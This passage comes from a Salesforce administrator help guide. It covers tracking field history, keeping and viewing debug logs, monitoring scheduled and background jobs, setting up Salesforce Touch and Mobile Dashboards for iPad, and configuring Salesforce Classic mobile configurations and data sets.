• Enabling or disabling Customer Portal or partner portal users

Tracking Field History
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Standard Objects are not available in Database.com

You can select certain fields to track, and display the field history in the History related list of an object. You can track the
field history of custom objects, as well as the history of the following standard objects:

• Accounts

• Cases

• Contacts

• Entitlements

• Service contracts

• Contract line items

• Contracts

• Leads

• Opportunities

• Solutions

Modifying any of these fields adds a new entry to the History related list. All entries include the date, time, nature of the
change, and who made the change. Note that not all field types are available for history tracking. Certain changes, such as
case escalations, are always tracked.

Considerations
• Changes to fields with more than 255 characters are tracked as edited, and their old and new values are not recorded.
• Tracked field values are not automatically translated; they display in the language in which they were made. For example,

if a field is changed from Green to Verde, Verde is displayed no matter what a user’s language is, unless the field value
has been translated into other languages via the Translation Workbench. This also applies to record types and picklist
values.
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• Changes to custom field labels that have been translated via the Translation Workbench are shown in the locale of the
user viewing the History related list. For example, if a custom field label is Red and translated into Spanish as Rojo, then
a user with a Spanish locale will see the custom field label as Rojo. Otherwise, the user will see the custom field label as
Red.

• Changes to date fields, number fields, and standard fields are shown in the locale of the user viewing the History related
list. For example, a date change to August, 5, 2012 shows as 8/5/2012 for a user with the English (United States)
locale, and as 5/8/2012 for a user with the English (United Kingdom) locale.

See Also:
Tracking Field History for Standard Objects
Tracking Field History for Custom Objects
Methods for Archiving Field History
Disabling Field History Tracking

Tracking Field History for Standard Objects

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Standard Objects are not available in Database.com

User Permissions Needed

“Customize Application”To set up which fields are tracked:

If you use both business accounts and person accounts, review the following before enabling account field history tracking:

• Field history tracking for accounts affects both business accounts and person accounts.
• Enabling field history tracking on person accounts does not enable field history tracking on personal contacts.

To set up field history tracking:

1. From Setup, click Customize.
2. Select the object you want to configure.
3. Click Fields > Set History Tracking.

Note:  When you enable tracking for an object, be sure to customize your page layouts to include the object’s
history related list.

4. For accounts, contacts, leads, and opportunities, select the Enable Account History, Enable Contact History,
Enable Lead History, or Enable Opportunity History  checkbox.

5. Choose the fields you want tracked.

You can select a combination of up to 20 standard and custom fields per object.  This limit includes fields on business
accounts and person accounts.

Certain changes, such as case escalations, are always tracked.
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You can’t track the following fields:

• Formula, roll-up summary, or auto-number fields
• Created By and Last Modified By

• Expected Revenue field on opportunities
• Master Solution Title or the Master Solution Details fields on solutions; these fields display only for

translated solutions in organizations with multilingual solutions enabled.

6. Click Save.

Salesforce tracks history from this date and time forward. Changes made prior to this date and time are not included.

See Also:
Tracking Field History

Tracking Field History for Custom Objects

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Standard Objects are not available in Database.com

User Permissions Needed

“Customize Application”To set up which fields are tracked:

To track field history for custom objects:

1. From Setup, click Create > Objects.
2. Click Edit next to the name of the custom object.
3. Select the Track Field History checkbox.

Note:  When you enable tracking for an object, be sure to customize your page layouts to include the object’s
history related list.

4. Click Save.
5. Click Set History Tracking in the Custom Fields & Relationships section.

This section allows you to set a custom object’s history for both standard and custom fields.

6. Choose the fields you want tracked.

You can select up to 20 standard and custom fields per object. You can’t track:

• Formula, roll-up summary, or auto-number fields
• Created By and Last Modified By

7. Click Save.
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Salesforce tracks history from this date and time forward. Changes made prior to this date and time are not included.

See Also:
Tracking Field History

Methods for Archiving Field History

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Standard Objects are not available in Database.com

To archive field history, you can use one of the following options:

• Schedule a regular export of FieldHistory data.

• Export an object-specific field history report to a CSV file.

• Run a query using the SOAP API and save your results.

See Also:
Tracking Field History

Disabling Field History Tracking

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Standard Objects are not available in Database.com

User Permissions Needed

“Customize Application”To set up which fields are tracked:

Note:  You cannot disable field history tracking for an object if a field on the object is referenced in Apex.

1. Select the object whose field history tracking you want to disable.

a. For standard objects, from Setup, click Customize.
b. For custom objects, from Setup, click Create > Objects.

2. Deselect the Track Field History checkbox.

If you deselect the checkbox, the History related list is automatically removed from the associated object’s page layouts.
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If you disable field history tracking on a standard object, you can still report on its history data up to the date and time
that you disabled tracking. If you disable field history tracking on a custom object, then you cannot report on its field
history.

See Also:
Tracking Field History

Monitoring Debug Logs
Available in Enterprise, Developer, Unlimited, and Database.com Editions

The Salesforce user interface and Email Services are not available in Database.com.

User Permissions Needed

“Manage Users”To view, retain, and delete debug logs:

You can retain and manage the debug logs for specific users.

To view saved debug logs, from Setup, click Monitoring > Debug Logs or Logs > Debug Logs.

From this page, click New to specify a user that you want to retain debug logs for.

After you have specified a user or users to retain debug logs for, you can:

• Click Delete to stop retaining debug logs for a specific user.

• Click Reset to reset the number of debug logs for a particular user.

• Click Filters to specify what gets logged for that user, as well as the amount of information.

After you have started retaining debug logs, you can:

• Click View to view a specific log's details.

• Click Download to download the debug log as an XML file.

See Also:
Retaining Debug Logs
Viewing Debug Logs
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Retaining Debug Logs

Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Manage Users”To view, retain, and delete debug logs:

You can retain and manage the debug logs for specific users.

The following are the limits for debug logs:

• Once a user is added, that user can record up to 20 debug logs. After a user reaches this limit, debug logs stop being recorded
for that user. Click Reset on the Monitoring Debug logs page to reset the number of logs for that user back to 20. Any
existing logs are not overwritten.

• Each debug log can only be 2 MB. Debug logs that are larger than 2 MB are reduced in size by removing older log lines,
such as log lines for earlier System.debug statements. The log lines can be removed from any location, not just the start
of the debug log.

• Each organization can retain up to 50 MB of debug logs. Once your organization has reached 50 MB of debug logs, the
oldest debug logs start being overwritten.

To specify that a user should have his or her debug logs retained:

1. From Setup, click Monitoring > Debug Logs or Logs > Debug Logs, then click New.
2. Click the checkbox next to the user or users for whom you want to retain debug logs. Only users with a checkbox next to

their names don't currently have their debug logs retained.
3. Click Save.

See Also:
Monitoring Debug Logs

671

Monitoring Debug LogsMonitor Your Organization



Viewing Debug Logs

Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“View All Data”To use the Developer Console:

“Author Apex”To execute anonymous Apex:

“Author Apex”To save changes to Apex classes and triggers:

“Customize Application”To save changes to Visualforce pages and components:    

To view the details of a debug log, from Setup, click Monitoring > Debug Logs or Logs > Debug Logs, and then click View
next to the debug log you want to examine. Click Download to download the log as an XML file.

The debug log contains information about the transaction, such as if it was successful, the size of the log (in bytes), how long
the transaction took in milliseconds, and so on. The log itself contains additional information about the transaction, depending
on the filters set for the user.

See Also:
Monitoring Debug Logs

Monitoring Scheduled Jobs
Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Analytic Snapshots and Dashboards are not available in Database.com

User Permissions Needed

“View Setup and Configuration”To monitor scheduled jobs:

The All Scheduled Jobs page lists all analytic snapshots, scheduled Apex jobs, and dashboards scheduled to refresh.

To view this page, from Setup, click Monitoring > Scheduled Jobs or Jobs > Scheduled Jobs. Depending on your permissions,
you can perform some or all of the following actions:

• Click Del to permanently delete all instances of a scheduled job.

• View the details of a scheduled job, such as:

◊ The name of the scheduled job

◊ The name of the user who submitted the scheduled job
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◊ The date and time at which the scheduled job was originally submitted

◊ The date and time at which the scheduled job started

◊ The next date and time at which the scheduled job will run

◊ The type of scheduled job

Monitoring Background Jobs
Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To monitor background jobs:

You can monitor background jobs if your organization has parallel sharing recalculation enabled. Parallel sharing recalculation
helps larger organizations to speed up sharing recalculation of each object. Contact salesforce.com to determine if this feature
is appropriate for your organization.

To view any background jobs in your organization, from Setup, click Monitoring > Background Jobs or Jobs > Background
Jobs. The All Background Jobs page shows the details of background jobs, including a percentage estimate of the recalculation
progress.

Note:  You can only monitor background jobs on this page. Contact salesforce.com to abort a background job.

See Also:
Recalculating Sharing Rules
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CONFIGURE SALESFORCE MOBILE APPS

MOBILE DASHBOARDS FOR IPAD

Let Users View Dashboards on the iPad
The Mobile Dashboards for iPad app is automatically enabled for your organization so your users can access the app without
any configuration on your part.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view Mobile Dashboards for iPad settings:

“Customize Application”To modify Mobile Dashboards for iPad settings:

You can disable the app if you don’t want users accessing Salesforce data from mobile devices and you can easily re-enable it
if you change your mind later.

To configure access to Mobile Dashboards for iPad:

1. From Setup, click Mobile Administration  > Mobile Dashboards  > Settings.
2. Select or deselect Enable the Mobile Dashboards iPad app for all users.
3. Click Save.

Users can download and install the Mobile Dashboards for iPad app from the Apple App Store or AppExchange Mobile.

Aside from editions noted, the app is available to organizations enabled with REST API.

See Also:
Share Insights with Dashboards
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SALESFORCE TOUCH

Setting Up Salesforce Touch

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions.

Salesforce Platform licenses are also supported.

User Permissions Needed

“View Setup and Configuration”To view Salesforce Touch settings:

“Customize Application”

“Modify All Data”

To modify Salesforce Touch settings:

Salesforce Touch is a variation of Salesforce that’s designed for touchscreen mobile devices. There are two versions of Salesforce
Touch: a downloadable app that’s available from the Apple App Store or AppExchange Mobile, and a mobile browser app.
You can limit your organization to a single version or enable both versions. If you enable both, users can access either app
interchangeably.

To enable and configure Salesforce Touch for your organization:

1. From Setup, click Mobile Administration > Salesforce Touch > Settings.
2. In the Downloadable App Settings section, enable the Salesforce Touch downloadable app for all users in your

organization by selecting the mobile devices that can access the app. (In this release, Apple® iPad® and iPhone® are the
available options.) Disable access to this app by deselecting all of the devices in this section.

The downloadable app is enabled by default. If you disable this app, users can still install the app but they can’t use it to
log in to their Salesforce accounts.

3. In the Mobile Browser App Settings section, enable the Salesforce Touch mobile browser app for all users in your
organization by selecting the mobile devices that can access the app. (In this release, iPad and iPhone devices are the
available options.) Disable access to this app by deselecting all of the devices in this section.

The mobile browser app is disabled by default. If you enable this option, users who log in to Salesforce from the Safari®

browser on iPad and iPhone devices are automatically redirected to Salesforce Touch.

Note:

If users prefer to access the full Salesforce site from Safari instead, they can turn off the mobile browser app
redirection for themselves, from the app or from the full site by deselecting the Touch User checkbox at either
Setup > My Personal Information > Personal Information or My Settings > Personal > Advanced User Details.

Doing this means the user won’t be able to access the mobile browser app from any of their supported mobile
devices.
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4. Click Save.

You can also enable the use of Visualforce tabs in Salesforce Touch. See Enabling Visualforce Tabs in Salesforce Touch for
all of the steps required to do this.

Enabling Visualforce Tabs in Salesforce Touch

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions.

Salesforce Platform licenses are also supported.

User Permissions Needed

“View Setup and Configuration”To view Salesforce Touch settings:

“Customize Application”

“Modify All Data”

To modify Salesforce Touch settings:

“Author Apex”To enable the display of Visualforce tabs in Salesforce Touch:

You can enable Visualforce tabs to display in both the downloadable and mobile browser versions of Salesforce Touch, allowing
users to access associated Visualforce pages directly from the Salesforce Touch interface.

Note:  Other forms of Visualforce, including inline Visualforce, overridden Visualforce pages, and standard Visualforce
buttons and links, aren’t supported in this release of Salesforce Touch.

1. Enable Visualforce pages for Salesforce Touch.

a. From Setup, click Develop > Pages.
b. Edit the desired Visualforce page.
c. Select Available in Touch then click Save.

Any tabs that are associated with the page will display in Salesforce Touch. If the page isn’t associated with a Visualforce
tab, users won’t be able to access the page from Salesforce Touch. 

2. Turn on Visualforce support in Salesforce Touch.

a. From Setup, click Mobile Administration > Salesforce Touch > Settings.
b. Select Enable Visualforce in Salesforce Touch then click Save.

Visualforce tabs in Salesforce Touch are indicated by the  icon. Tapping the icon opens the tab—and the associated
Visualforce page—in a slightly different way, depending on the version of Salesforce Touch.

• Downloadable app—The Visualforce page opens in the Salesforce Touch in-app (child) browser. The Visualforce page
is rendered with showHeader=false so all Salesforce header and sidebar navigation is suppressed.

• Mobile browser app—The Visualforce page opens in a new mobile browser tab, outside of the Salesforce Touch interface.
The Salesforce header and sidebar are displayed and can be used to navigate within Salesforce.

In both cases, the Visualforce page functions the same as if you were viewing it in the full Salesforce site.

676

Enabling Visualforce Tabs in Salesforce TouchSalesforce Touch



Here are some notes about Visualforce tab support in this release of Salesforce Touch:

• Standard object tabs that are overridden with a Visualforce page aren't supported in Salesforce Touch. The Visualforce
page is shown for full site users but Salesforce Touch users will see the default Salesforce Touch page for the entity
instead. This restriction exists to maintain the Salesforce Touch experience for standard objects.

• Other Visualforce pages that are accessed from a Salesforce Touch-enabled Visualforce page don't need to be enabled for
Salesforce Touch.

• You can also enable Visualforce pages for Salesforce Touch through the metadata API by editing the isAvailableInTouch
field on the ApexPage object.

• The Mobile Ready checkbox on Visualforce Tab setup pages is for the Salesforce Classic app only and has no effect on
Visualforce in Salesforce Touch.

See Also:
Setting Up Salesforce Touch

SALESFORCE CLASSIC

Salesforce Classic Overview for Administrators
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

Salesforce Classic helps your teams succeed by allowing users to access their latest Salesforce data, whenever and wherever
they need it, directly from Android™, BlackBerry® and iPhone® devices. The Salesforce Classic app exchanges data with
Salesforce over mobile or wireless networks, and stores a local copy of the user’s data in its own database on the mobile device.
Users can edit local copies of their Salesforce records when a data connection isn’t available, and transmit those changes to
Salesforce when a connection is available again. The app also promotes near real-time logging of critical information by
prompting users to enter updates directly in Salesforce or Force.com AppExchange apps after important customer calls, emails,
or appointments.

A Salesforce Classic license is required for each user to use the full version of Salesforce Classic. For organizations using
Unlimited and Developer Editions, salesforce.com provides one mobile license for each Salesforce license. Organizations using
Professional or Enterprise Editions must purchase mobile licenses separately.

Any Salesforce user who doesn't have a mobile license can download a free, restricted version of Salesforce Classic. The free
version:

• Supports fewer standard objects

• Doesn't support custom objects

• Doesn't allow administrators to customize or create mobile configurations

• Isn’t available for use by partner portal users

677

Salesforce Classic Overview for AdministratorsSalesforce Classic



Note: The Android, BlackBerry, and iPhone apps are available in English, Japanese, French, German, and Spanish.
Contact salesforce.com to turn on Salesforce Classic for your organization.

See Also:
Setting Up Salesforce Classic
Salesforce Classic Implementation Guide
Salesforce Classic User Guide for BlackBerry
Salesforce Classic User Guide for iPhone

About the Salesforce Classic Default Configuration
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

Mobile configurations for the Salesforce Classic app are sets of parameters that determine what data Salesforce transmits to
users' mobile devices and which users receive the data on their mobile devices. A default mobile configuration is provided for
Professional, Enterprise, Unlimited, and Developer Edition organizations. Administrators can’t view or edit the default mobile
configuration.

Users are automatically assigned to the default mobile configuration when they activate their Salesforce account from a supported
mobile device using the Salesforce Classic app.

The default mobile configuration:

• Allows users with an assigned mobile license to install and activate Salesforce Classic, even if you haven’t yet assigned them
to a mobile configuration.

• Allows users without an assigned mobile license to install and activate the free version of Salesforce Classic.

You can disable Salesforce Classic to prevent users from activating the Salesforce Classic app.

The default configuration can mobilize the following objects:

• Accounts

• Assets

• Cases

• Contacts

• Dashboards

• Events

• Leads

• Opportunities

• Reports

• Solutions

• Tasks
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Note:

• Not all objects available in the Salesforce Classic app are mobilized with the default configuration.

• Assets aren’t available as a tab in the Salesforce Classic app but display as a related list for accounts, cases, and
contacts.

The default configuration automatically synchronizes records the user recently accessed in Salesforce on the Salesforce Classic
app. Users can search for records that aren’t automatically synchronized; once the user downloads a record, the record becomes
a permanent part of the data set. In addition to recently accessed records, the default configuration synchronizes activities
closed in the past five days and open activities due in the next 30 days.

Salesforce Classic Implementation Tips and Best Practices
Set up the Salesforce Classic app using these tips and best practices.

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic configurations:

“Manage Mobile Configurations”To create, change, or delete Salesforce Classic configurations:

Building Lean Data Sets

• Keep the data sets in your mobile configurations as small as possible. Not only do lean data sets greatly improve the
Salesforce Classic app's performance, but they also make the app easier to use. Pushing massive amounts of data to the
device might seem like a good idea, but the important records tend to get lost among the ones that aren't relevant to users'
day-to-day activities. Small data sets are powerful because the Salesforce Classic app synchronizes with Salesforce every
20 minutes, so the data is constantly refreshed with new and updated records. Even if your mobile configurations don't
account for every possible record your users might need, they can search for records that aren't automatically synchronized
to their devices.

To build small data sets:

◊ Nest the objects in the data set tree. For example, add contacts as a child data set of the account object so that the data
set includes contacts related to the mobilized accounts instead of all the user's contacts.

◊ Avoid setting the record ownership filter to All Records unless your organization uses a private sharing model. It's
unlikely that users need to see all of an object's records on their devices. Instead of mobilizing all opportunity records,
for example, mobilize just the opportunities owned by the user or the user's opportunity team.

◊ Use filters that synchronize the most relevant records. For example, even if you limit the opportunities on the device
to records owned by the user, you could further prune the data set by mobilizing only opportunities closing this month.

◊ Set a record limit to prevent the data set from getting too large. Generally, a single data set should generate no more
than 2,500 records.

• Another way to build lean data sets is to mobilize the Salesforce recent items list, add the data sets, and set the record
ownership filters in your data sets to None (Search Only). The user's data set is populated with records recently accessed

679

Salesforce Classic Implementation Tips and Best PracticesSalesforce Classic



in Salesforce, and those records in turn synchronize additional data based on the data set hierarchy. For example, let's say
you create a data set with the account object at the root level and add the contact, task, and event objects as child data sets.
When the Salesforce Classic app synchronizes an account from the Salesforce recent items list, it also synchronizes the
contacts, tasks, and events related to that account.

• If you're not sure which fields to use as filters for your data sets or mobile views, consider using the Last Activity Date
field. For example, set up a filter that synchronizes contacts with an activity logged this week or this month. The Last
Activity Date field is a better indicator of a record's relevance than the Last Modified Date field—often the main detail
of a record remains unchanged even though users frequently log related tasks and events.

Mobilizing Records Users Need

• Before mobilizing a custom object, make sure the object's functionality is compatible with the Salesforce Classic app.
Salesforce Classic doesn’t support S-controls, mashups, merge fields, image fields, or custom links.

• To obtain a relevant set of activities, mobilize the task and event objects at the root level of the data set hierarchy and nest
them under parent objects, like contacts, accounts, and opportunities. Adding tasks and events at multiple levels ensures
that users will see their personal activities and activities related to the records on their devices. Avoid mobilizing too much
activity history or too many tasks and events not owned by the user. Generally, there are more task and event records in
an organization than any other type of record, so it's easy to bloat data sets with too many activities.

• If your sales representatives frequently take orders in the field and need a comprehensive inventory list, add the product
object at the root level of the data set hierarchy. Nesting the opportunity product object below the opportunity object won't
mobilize all products.

• If your users need to assign tasks to other users or change the record owner, mobilize the user object so that the names of
other users will be available on the device. Avoid mobilizing all user records—instead, set up filters based on the role or
profile.

• Be sure that users assigned to a mobile configuration have field-level access to all the fields used in the configuration's filter
criteria. If a user doesn't have access to a field in a data set's filter criteria, the Salesforce Classic app won't synchronize the
records for that data set or its child data sets.

• You can sometimes use cross-object formula fields to work around limitations of the Salesforce Classic app. For example,
Salesforce Classic doesn't support campaigns, so you can't add the campaign object as a data set and add the opportunity
object as its child data set to get the related records. However, you can create a text formula field on the opportunity object
equal to the name of the parent campaign. The field needs to be visible, but it doesn't need to be included on your page
layouts. Then add the opportunity object to the data set and use the new formula field to filter opportunities related to a
specific campaign.

• Although a mobile configuration might include an object at multiple levels in the data set hierarchy, users won't see duplicate
tabs in the Salesforce Classic app. Only one Task tab appears on the device even if you mobilize the task object at the root
level and as a child data set of three objects.

Customizing Mobile Configurations

• Clean up your mobile page layouts by excluding fields from the objects in the mobile configuration. Less data is sent to
the device, and mobile users don't have to scroll through unnecessary fields.

• If you mobilize the Dashboards tab, be sure to select any other tabs that should appear in the Salesforce Classic app.
Customizing the tabs for a mobile configuration overrides the default tab set—if you only mobilize the Dashboard tab, it
will be the only tab sent to the device.

• Due to the small size of mobile device screens, you can only select two display columns for mobile views. If you need three
columns of data, create a text formula field on the object that concatenates the three fields, then use the formula field in
the mobile view criteria.

• When creating mobile views, you can filter based on the current user with the $User.ID global variable, but you can't enter
a user's name as a value in the filter criteria. To build a view based on users, create a text formula field on the appropriate
object, then use the formula field in the mobile view criteria. For example, to create a view that displays opportunities
owned by an opportunity team, create a text formula field on the opportunity object that contains the opportunity owner's
user ID or role, then create a view that filters on values in that field.
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Testing and Deploying the Mobile Product

• It's important to test mobile configurations to make sure they're synchronizing an acceptable amount of data. Test
configurations against active users who own a very large number of records. Typically, most data sets generate between
500 KB and 4 MB of data. If the data sets are over 4 MB, refine the filter criteria to limit the amount of data sent to the
device.

• You can use the Salesforce Classic app in the sandbox before deploying to your organization.
• Use of the Salesforce Classic app requires a data plan. The wireless data volume for the Salesforce Classic app varies greatly

between customers and even users in the same organization. It's impossible to predict your organization's data usage, but
we can offer some guidelines:

◊ The initial data download consists of records that match the criteria specified in the user's mobile configuration and
the metadata needed to support these records when disconnected. On average, the data sizes range from 500 KB–4
MB.

◊ After the initial download of data, incremental update requests are initiated by the client app every 20 minutes. Each
of these requests and the corresponding server response are approximately 200 bytes.

◊ If any new data is downloaded to the client app as a result of the update request, only the new or changed values are
sent. For example, the Salesforce Classic app only downloads the new phone number in a contact record, not the entire
contact record. The amount of data transmitted differs for every organization and every user.

Generally, the volume of data transmitted by the Salesforce Classic app is low compared to moderate email usage.

• If you're deploying to BlackBerry users, evaluate your corporate network infrastructure before implementing the mobile
solution.

Best Practices

• Use the zero-administration deployment option to experiment with the Salesforce Classic app before you set up mobile
configurations. You'll create better blueprints for your mobile configurations if you've tried using the Salesforce Classic
app.

• Talk to users about their favorite reports, views, and dashboards to get ideas for what filter criteria to use in mobile
configurations.

• After setting up mobile configurations, deploy the Salesforce Classic app on a limited basis with a select group of users.
Adjust the mobile setup based on their feedback, then deploy to all of your users.

Setting Up Salesforce Classic
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic settings:

“Manage Mobile Configurations”To change Salesforce Classic settings:

To deploy the Salesforce Classic app to your organization:

1. Review the mobile implementation tips and best practices
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2. Enable mobile users on page 682
3. Create one or more mobile configurations
4. Define the data sets for your mobile configurations
5. Test the mobile configurations
6. Customize mobile page layouts and adjust mobile user permissions (optional)
7. Customize mobile tabs (optional)
8. Create custom mobile views (optional)
9. Set up dashboards (optional)
10. Set up mobile reports (optional)
11. Set up Salesforce CRM Content (optional)
12. Configure access for partner users (optional)
13. Create links to Web and Visualforce Mobile pages (optional)
14. Notify users that Salesforce Classic is available for download

When users download the Salesforce Classic app and activate their accounts, you can manage their devices in the Salesforce
Classic Administration Console.

See Also:
Managing Salesforce Classic Configurations
Managing Salesforce Classic Devices

Enabling Salesforce Classic Users

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic settings:

“Manage Mobile Configurations”To change Salesforce Classic settings:

To enable users to access to the full version of Salesforce Classic:

1. Allocate mobile licenses to users by selecting the Mobile User checkbox on the user record. The Mobile User checkbox
is enabled by default for all Unlimited and Developer Edition users.

2. Edit each custom profile to which Salesforce Classic users are assigned to include the “API Enabled” permission. Salesforce
Classic users need access to the API so their mobile devices can communicate with Salesforce. The “API Enabled” permission
is enabled by default on standard profiles.

Note: The Android, BlackBerry, and iPhone apps are available in English, Japanese, French, German, and Spanish.
Contact salesforce.com to turn on Salesforce Classic for your organization.
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To prevent users from activating the full version of Salesforce Classic on their mobile devices before you’re ready to deploy
the app, disable the Mobile User checkbox for all your users.

Note:  If you deselect this checkbox for a user who is already assigned to a mobile configuration, Salesforce removes
that user from the mobile configuration and assigns the user to the default mobile configuration.

The free version of Salesforce Classic is enabled by default. If you want to block users without Salesforce Classic licenses from
accessing their Salesforce data on mobile devices, disable the free version of Salesforce Classic.

1. From Setup, click Mobile Administration > Salesforce Classic > Settings.
2. Click Edit.
3. Deselect Enable Mobile Lite.

Note:  If you deselect this option while users are running the Salesforce Classic app, the Salesforce data on their
devices is erased the next time the devices synchronize with Salesforce.

4. Click Save.

See Also:
Salesforce Classic Implementation Guide
Salesforce Classic User Guide for BlackBerry
Salesforce Classic User Guide for iPhone
Setting Up Salesforce Classic

Creating Salesforce Classic Configurations

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic configurations:

“Manage Mobile Configurations”To create, change, or delete Salesforce Classic configurations:

Mobile configurations are sets of parameters that determine the data Salesforce transmits to users' mobile devices, and which
users receive that data on their mobile devices. Organizations can create multiple mobile configurations to simultaneously suit
the needs of different types of mobile users. For example, one mobile configuration might send leads and opportunities to the
sales division, while another mobile configuration sends cases to customer support representatives.

Before creating your mobile configurations, plan which profiles and users you want to assign to each configuration. Each
mobile configuration only affects the mobile devices of users assigned to the configuration.

To create a mobile configuration:
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1. Enter Basic Information
2. Assign Users and Profiles
3. Set Total Data Size Limit
4. Complete Your Mobile Configuration

Note:

A default mobile configuration on page 678 is provided for Professional, Enterprise, Unlimited, and Developer Edition
organizations. You can’t view or edit the default configuration.

Any Salesforce user who doesn't have a mobile license can download a free, restricted version of Salesforce Classic.
These users are assigned to the default mobile configuration when they activate their Salesforce account from a mobile
device.

Enter Basic Information

1. From Setup, click Mobile Administration > Salesforce Mobile > Configurations to access the mobile configurations list
page.

2. Click New Mobile Configuration.
3. Enter a name for the mobile configuration.
4. Select the Active checkbox if you want to activate the mobile configuration immediately after creating it. The mobile

configuration does not work until you select this checkbox.

If you deactivate an active mobile configuration, Salesforce saves all requests from devices of the users assigned to the
mobile configuration for up to one week. If you reactivate the mobile configuration, Salesforce executes those requests in
the order received.

5. Optionally, enter a description for the mobile configuration.
6. Optionally, select the Mobilize Recent Items checkbox to mark recently used records in Salesforce for device

synchronization.

Selecting this option ensures that mobile users assigned to the configuration will not have to search for and download items
they recently accessed on Salesforce, even if those records do not meet the configuration's filter criteria. Only records
belonging to mobilized objects can be marked for device synchronization; for example, if you do not mobilize the account
object in a configuration, users assigned to that configuration cannot automatically receive recent accounts on their devices.

7. If you select the Mobilize Recent Items checkbox, select a value from the Maximum Number of Recent Items
drop-down list. Set a low number if your users have minimal free space on their mobile devices.

8. Optionally, select the Mobilize Followed Records checkbox to automatically synchronize records users are following
in Chatter to their mobile device. The device only synchronizes followed records for objects included in the mobile
configuration's data set.

The Mobilize Followed Records checkbox is only available if Chatter is enabled for your organization.

Assign Users and Profiles

You can assign individual users and profiles to each mobile configuration. If you assign a profile to a mobile configuration,
the mobile configuration applies to all Salesforce Classic users with that profile unless a specific user is assigned to another
mobile configuration.

Tip:  For ease of administration, we recommend that you assign mobile configurations to profiles; however, you may
have situations in which you need to assign a configuration directly to individual users.

To assign users and profiles to a mobile configuration:
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1. In the Search drop-down list, select the type of member to add: users or profiles. This drop-down list is not available if
you have not enabled the Mobile User checkbox on any user records, or if all users are already assigned to a mobile
configuration; in that case, you can only assign profiles to this mobile configuration.

2. If you do not immediately see the member you want to add, enter keywords in the search box and click Find.
3. Select users and profiles from the Available Members box, and click the Add arrow to add them to the mobile

configuration.

You can assign each user and profile to only one mobile configuration.

The Available Members box only displays users who have the Mobile User checkbox enabled.

4. If there are users or profiles in the Assigned Members box you do not want to assign to this mobile configuration, select
those users and click the Remove arrow.

Warning:  Removing a user from an active mobile configuration deletes the Salesforce-related data on the user's
mobile device but does not delete the client application.

Set Total Data Size Limit

Different types of mobile devices offer different memory capacities, and some devices experience serious problems if all of the
flash memory is used. To avoid overloading mobile devices, optionally specify a total data size limit for each mobile configuration.
The total data size limit prevents Salesforce from sending too much data to the mobile devices of users assigned to the mobile
configuration.

To set the total data size limit, use the Don't sync if data size exceeds drop-down list to specify the amount of
memory that is consistently available on the mobile devices of users who are assigned to this mobile configuration. If the
combined size of all the data sets exceeds this limit, users assigned to this profile receive an error message on their mobile
devices, and Salesforce will not synchronize any data sets in this mobile configuration. Test your mobile configuration to make
sure the data sets do not exceed the total data size limit.

Tip:  To reduce the size of your data, do one or more of the following:

• Delete a data set.
• Reduce the scope of your data sets.
• Refine the filter criteria of your data sets.

Complete Your Mobile Configuration

Click Save. Note that your mobile configuration is not active until you select the Active checkbox.

See Also:
Managing Salesforce Classic Configurations
Defining Data Sets
Setting Up Salesforce Classic
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Defining Data Sets

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view mobile data sets:

“Manage Mobile Configurations”To create, change, or delete mobile data sets:

Accessing Salesforce from a mobile device is very different than accessing it from your computer. This is because mobile devices
generally have less memory and screen size than computers, and they do not maintain a constant network connection. To
work with these limitations, each mobile configuration only transfers data sets, which are subsets of the records users access
in the Salesforce online user interface. Mobile devices store data sets in on-board databases, allowing users to access their most
important records and work offline when no network connection is available. Salesforce automatically synchronizes the on-board
databases when the mobile device reestablishes a network connection.

Each data set can contain records related to a single object and is classified by the name of that object. For example, the
Accounts data set only includes account records.

Data sets can have child data sets, which are data sets that contain records associated with a top-level (parent) data set. For
example, if the first level of your hierarchy has an Accounts data set, you can add a Contacts child data set that includes all
contact records related to the account records. Child data sets appear as related lists on mobile devices.

A single mobile configuration can have multiple data sets for the same object and at different levels. For example, you can
have an Events parent data set and an Events child data set under Leads.

Tip:  Review the sample data sets to see how you might define data sets for common groups of Salesforce users.

After creating a mobile configuration, you must define its data sets. To access the data sets for a mobile configuration:

1. Click Mobile Administration > Salesforce Mobile > Configurations, and click the name of the mobile configuration
you want to modify.

2. In the Data Sets related list, click Edit.
3. From the Data Sets page, you can:

• Add a data set.
• Remove a data set by selecting the data set you want to remove and clicking Remove.
• Edit a data set by selecting the data set you want to edit in the hierarchy. The right pane displays the filters for that

data set.
• Test your mobile configuration.

As you define and modify the data sets, Salesforce automatically saves your changes.

4. Click Done when you are finished.
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Adding Data Sets

To add a data set:

1. In the hierarchy, select Data Sets to create a parent data set, or select an existing data set to create a child data set.
2. Click Add....
